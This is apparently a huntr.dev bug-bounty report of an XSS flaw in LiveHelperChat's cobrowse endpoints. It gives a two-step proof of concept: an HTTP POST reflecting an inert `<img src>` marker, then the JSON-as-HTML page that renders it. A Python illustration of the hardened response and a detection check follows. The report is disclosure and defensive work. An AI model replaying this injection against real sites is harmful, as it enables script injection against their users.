huntr report 0D235252-0882-4053-85C1-B41B94C814D4 by mylong, Apr 04, 2022 - 3:25 p.m.

XSS in livehelperchat

2022-04-04 15:25:27
mylong
www.huntr.dev

EPSS: 0.001 (Low)

EPSS Percentile: 30.2%

Description

LiveHelperChat is vulnerable to XSS in /cobrowse/checkmirrorchanges/: the endpoint reflects the url parameter into its JSON response content while the response Content-Type is still html, so a browser loading the endpoint directly renders the reflected value as markup.

**STEP 1:**
Set the url parameter in the following request:

```http
POST /cobrowse/storenodemap/(hash)/1_74QXubVQ2cHdPR5xt5vNLBWVRnRwNu6MBWHoxRs3/?url=<img src> HTTP/1.1
Host: demo.livehelperchat.com
Cookie: lhc_vid=870cb399a6e325442af4; PHPSESSID=7cn9ufgv0vtk2fq4occksshj4q
Content-Length: 9
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="99"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-Csrftoken: 2b273ff9db24ba85229086357ed9e16f
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.livehelperchat.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.livehelperchat.com/site_admin/cobrowse/browse/2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

data=[{}]
```

(screenshot: image-20220404231924708)

**STEP 2:**
Open https://demo.livehelperchat.com/cobrowse/checkmirrorchanges/1/ with the corresponding chat id (here 1).

(screenshot: image-20220404232159135)
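As an added illustration (not LiveHelperChat's code and not part of the report), the response pattern described above is modelled in Python beside its hardened form, together with the check a reviewer would run over a captured response. The endpoint and header names are assumptions standing in for the real handler; the sample value is the report's `<img src>` marker.

```python
import json

# Constructed sample value: the marker used in the report's proof of concept.
SAMPLE_URL = "<img src>"


def json_response_as_html(payload: dict) -> tuple[dict, str]:
    """Pattern from the report (modelled, hypothetical handler): a JSON body is
    emitted, but the Content-Type stays text/html, so a browser that opens the
    endpoint directly parses the reflected value as markup."""
    return {"Content-Type": "text/html; charset=utf-8"}, json.dumps(payload)


def json_response_hardened(payload: dict) -> tuple[dict, str]:
    """Hardened form: declare the real media type, forbid sniffing, and escape
    HTML-significant characters inside JSON strings (same effect as PHP's
    JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS flags on json_encode)."""
    body = json.dumps(payload)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"), ("'", "\\u0027")):
        body = body.replace(ch, esc)
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return headers, body


def reflects_markup_as_html(headers: dict, body: str) -> bool:
    """Review/detection check: True when a body that parses as JSON is served
    under text/html and still carries raw angle brackets (the condition the
    report describes)."""
    media_type = headers.get("Content-Type", "").split(";")[0].strip().lower()
    try:
        json.loads(body)
    except ValueError:
        return False  # not a JSON body; outside the pattern this check targets
    return media_type == "text/html" and ("<" in body or ">" in body)


if __name__ == "__main__":
    payload = {"url": SAMPLE_URL, "data": [{}]}
    h, b = json_response_as_html(payload)
    print("vulnerable pattern flagged:", reflects_markup_as_html(h, b))  # True
    h, b = json_response_hardened(payload)
    print("hardened pattern flagged:", reflects_markup_as_html(h, b))  # False
    print("value survives round trip:", json.loads(b)["url"] == SAMPLE_URL)  # True
```

The escaped body still decodes to the original string on the client, so the fix changes only how the bytes are interpreted by a browser, not what the JavaScript caller receives.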
